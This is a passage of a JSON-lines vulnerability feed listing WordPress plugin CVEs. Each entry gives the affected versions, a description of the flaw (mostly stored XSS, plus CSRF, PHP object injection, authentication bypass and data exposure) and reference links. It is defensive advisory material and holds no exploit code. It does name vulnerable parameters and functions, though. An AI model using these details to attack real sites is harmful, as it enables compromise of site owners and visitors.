password.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/commit\\\/68eab0cab6882eafef4bfece884093eeda5ac018\",\"name\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/commit\\\/68eab0cab6882eafef4bfece884093eeda5ac018\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/issues\\\/546\",\"name\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/issues\\\/546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267487\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267487\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/simple-history.com\\\/support\\\/detective-mode\\\/\",\"name\":\"https:\\\/\\\/simple-history.com\\\/support\\\/detective-mode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-history\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-history\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/security-vulnerability-passwords-stored-as-plain-text-in-logs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/security-vulnerability-passwords-stored-as-plain-text-in-logs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6364415-da02-4236-b635-d8fbd27faa33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6364415-da02-4236-b635-d8fbd27faa33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8568","slug":"gmap-venturit","versionImpact":"1.1","description":"The GMap Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018h\u2019 parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gmap-venturit\\\/trunk\\\/google-map.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gmap-venturit\\\/trunk\\\/google-map.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gmap-venturit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gmap-venturit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7875d6-e866-4625-94e5-2ef8a1d11503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7875d6-e866-4625-94e5-2ef8a1d11503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3125","slug":"b2bking-wholesale-for-woocommerce","versionImpact":"4.6.00","description":"The B2BKing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'b2bking_save_price_import' function in versions up to, and including, 4.6.00. This makes it possible for Authenticated attackers with subscriber or customer-level permissions to modify the pricing of any product on the site.","refs":"[{\"url\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f2c4c3-73d6-4b3b-8eb3-c494f52dc183?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f2c4c3-73d6-4b3b-8eb3-c494f52dc183?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4115","slug":"editorial-calendar","versionImpact":"3.7.12","description":"The Editorial Calendar WordPress plugin through 3.7.12 does not sanitise and escape its settings, allowing users with roles as low as contributor to inject arbitrary web scripts in the plugin admin panel, enabling a Stored Cross-Site Scripting vulnerability targeting higher privileged users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b5071e1-9532-4a6c-9da4-d07932474ca4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b5071e1-9532-4a6c-9da4-d07932474ca4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0058","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when creating and editing its shortcode, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e677df9-2c49-42f0-a8e2-dbcf85bfc1a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e677df9-2c49-42f0-a8e2-dbcf85bfc1a2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3996","slug":"armember-membership","versionImpact":"4.0.14","description":"The ARMember Lite - Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.armemberplugin.com\",\"name\":\"https:\\\/\\\/www.armemberplugin.com\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905086%40armember-membership%2Ftrunk&old=2885708%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905086%40armember-membership%2Ftrunk&old=2885708%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.md\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1022ac4-869e-415a-a7c8-3650421608ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1022ac4-869e-415a-a7c8-3650421608ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1731","slug":"auto-refresh-single-page","versionImpact":"1.1","description":"The Auto Refresh Single Page plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1 via deserialization of untrusted input from the arsp_options post meta option. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-refresh-single-page\\\/trunk\\\/auto-refresh-single-page.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-refresh-single-page\\\/trunk\\\/auto-refresh-single-page.php#L42\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0966","slug":"shariff","versionImpact":"4.6.9","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes like 'info_text'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks the information icon.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/services\\\/shariff-info.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/services\\\/shariff-info.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5504","slug":"rife-elementor-extensions","versionImpact":"1.2.1","description":"The Rife Elementor Extensions & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute within the plugin's Writing Effect Headline widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bc0b654-5174-41bc-9e8a-40257ceb7ded?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bc0b654-5174-41bc-9e8a-40257ceb7ded?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rife-elementor-extensions\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/writing-effect-headline.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rife-elementor-extensions\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/writing-effect-headline.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109903\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109903\\\/#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7629","slug":"responsive-video","versionImpact":"1.0","description":"The Responsive video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's video settings function in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires responsive videos to be enabled for posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c530f5d2-eed3-433b-bf96-656593ad6ce2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c530f5d2-eed3-433b-bf96-656593ad6ce2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-video\\\/trunk\\\/responsive-video.php#L534\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-video\\\/trunk\\\/responsive-video.php#L534\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8850","slug":"mailchimp-for-wp","versionImpact":"4.9.16","description":"The MC4WP: Mailchimp for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email' parameter when a placeholder such as {email} is used for the field in versions 4.9.9 to 4.9.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2ba8ea-a75f-4069-b67d-f832acb1deef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2ba8ea-a75f-4069-b67d-f832acb1deef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/tags\\\/4.9.16\\\/config\\\/default-form-content.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/tags\\\/4.9.16\\\/config\\\/default-form-content.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153075%40mailchimp-for-wp&new=3153075%40mailchimp-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153075%40mailchimp-for-wp&new=3153075%40mailchimp-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9989","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L138\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50541","slug":"advanced-control-manager","versionImpact":"2.16.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Stored XSS.This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n\/a through 2.16.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-control-manager\\\/wordpress-advanced-control-manager-plugin-2-16-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-control-manager\\\/wordpress-advanced-control-manager-plugin-2-16-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13495","slug":"gamipress","versionImpact":"7.2.1","description":"The The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via the gamipress_ajax_get_logs() function in all versions up to, and including, 7.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55fa8423-9a41-4afe-9401-03d232caa656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55fa8423-9a41-4afe-9401-03d232caa656?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13115","slug":"wp-projects-portfolio","versionImpact":"3.0","description":"The WP Projects Portfolio with Client Testimonials WordPress plugin through 3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e46727-3995-4442-bbcb-04e793d72108\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e46727-3995-4442-bbcb-04e793d72108\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5239","slug":"domain-for-sale","versionImpact":"3.0.10","description":"The Domain For Sale plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class_name\u2019 parameter in all versions up to, and including, 3.0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/domain-for-sale\\\/trunk\\\/src\\\/Admin\\\/GutenbergBlock\\\/Gutenberg_Block_Init.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/domain-for-sale\\\/trunk\\\/src\\\/Admin\\\/GutenbergBlock\\\/Gutenberg_Block_Init.php#L278\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306141\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306141\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/domain-for-sale\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/domain-for-sale\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb4cb5e-38ea-430e-b6ae-3712b3607a25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb4cb5e-38ea-430e-b6ae-3712b3607a25?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8462","slug":"rt-easy-builder-advanced-addons-for-elementor","versionImpact":"2.3","description":"The RT Easy Builder \u2013 Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the social URL parameter in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rt-easy-builder-advanced-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rt-easy-builder-advanced-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb02fd7-1090-4139-ae0e-977fdec5da7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb02fd7-1090-4139-ae0e-977fdec5da7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0422","slug":"article-directory","versionImpact":"1.3","description":"The Article Directory WordPress plugin through 1.3 does not properly sanitize the `publish_terms_text` setting before displaying it in the administration panel, which may enable administrators to conduct Stored XSS attacks in multisite contexts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d57f2fb2-5251-4069-8c9a-a4af269c5e62\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d57f2fb2-5251-4069-8c9a-a4af269c5e62\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3407","slug":"subscribe2","versionImpact":"10.40","description":"The Subscribe2 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.40. This is due to missing or incorrect nonce validation when sending test emails. This makes it possible for unauthenticated attackers to send test emails with custom content to users on sites running a vulnerable version of this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92b4d800-2895-4f7b-8b3b-ee6df75a7908?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92b4d800-2895-4f7b-8b3b-ee6df75a7908?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4782","slug":"clickfunnels","versionImpact":"3.1.1","description":"The ClickFunnels WordPress plugin through 3.1.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a0468a-8405-4b6c-800f-abd5ce5387b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a0468a-8405-4b6c-800f-abd5ce5387b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5128","slug":"tcd-google-maps","versionImpact":"1.8","description":"The TCD Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'map' shortcode in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f6d0aa-059d-48d9-873b-6404f288f002?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f6d0aa-059d-48d9-873b-6404f288f002?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1478","slug":"hkdev-maintenance-mode","versionImpact":"2.5.0","description":"The Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content via API thus bypassing the content protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hkdev-maintenance-mode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hkdev-maintenance-mode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6500","slug":"shariff","versionImpact":"4.6.9","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes such as 'secondarycolor' and 'maincolor'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cac2a45e-f09e-4639-9a45-68d528a5094e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cac2a45e-f09e-4639-9a45-68d528a5094e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
